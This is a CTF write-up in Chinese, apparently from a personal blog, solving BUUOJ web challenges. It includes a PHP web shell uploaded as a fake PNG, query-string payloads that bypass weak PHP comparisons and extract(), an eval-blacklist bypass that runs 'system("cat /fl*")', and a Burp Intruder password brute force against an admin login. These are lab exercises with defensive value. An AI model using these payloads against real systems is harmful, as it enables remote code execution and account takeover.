Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png
<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"
Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--
传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
flag
flag{32ae814a-7562-460c-a936-e6b88ed93f8f}
Begin of PHP
<?php
error_reporting(0);        // also hides the notices for $flag1..$flag5 when unset (they then read as false)
highlight_file(__FILE__);
// Level 1: the md5() hex digests are compared with loose ==. A digest of the
// form "0e<digits>" is treated as the number 0, so two different inputs whose
// digests both look like that compare equal; === would compare the strings.
if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}
// Level 2: key3 is never checked to be a string. Given an array (key3[]=),
// both hash calls fail and return NULL on the PHP version this ran on, and
// NULL === NULL holds; PHP 8 would throw a TypeError instead.
if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}
// Level 3: strcmp() with an array argument returns NULL rather than an int,
// and NULL == 0 is true, so the comparison against the real flag passes
// without knowing it. Check is_string() first and compare with ===.
if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}
// Level 4: is_numeric() is false for an array, and PHP orders any array above
// an int, so key5[]=1 satisfies both halves of the condition.
if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}
// Level 5: extract($_POST) imports every POST field as a local variable, so the
// client can set $flag5 directly and even replace $_POST itself, leaving the
// alphanumeric filter below nothing to iterate. Never extract() request data.
if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}
get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
R!C!E!
<?php
highlight_file(__FILE__);
// The POST field name contains dots, which PHP normally rewrites to '_' when
// building $_POST; the writeup sends it as "e[v.a.l" and relies on that
// name-mangling quirk to end up with the key 'e_v.a.l'.
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    // Only the first 6 hex chars (~24 bits) of the digest are checked, so a
    // matching password is found by brute force (the writeup used 114514).
    if(substr($password,0,6)==="c4d038"){
        // A keyword blacklist in front of eval() is not a security boundary:
        // the filtered words only have to be absent from $code itself, and the
        // writeup's payload wraps a second eval around another POST field.
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
}
爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
EasyLogin
密码应该是个md5
随便注册个用户看看
登录成功后看看源代码可以肯定是md5
是个弱口令
尝试爆破admin
发送到intruder
payload位置选择pwd
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
有个8360的不一样,应该就是爆破成功的,把pw复制一下
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
修改完pw后一直点放行,抓到含flag的response包
本文来自博客园,作者:{Tree_24},转载请注明原文链接:{https://www.cnblogs.com/Tree-24/}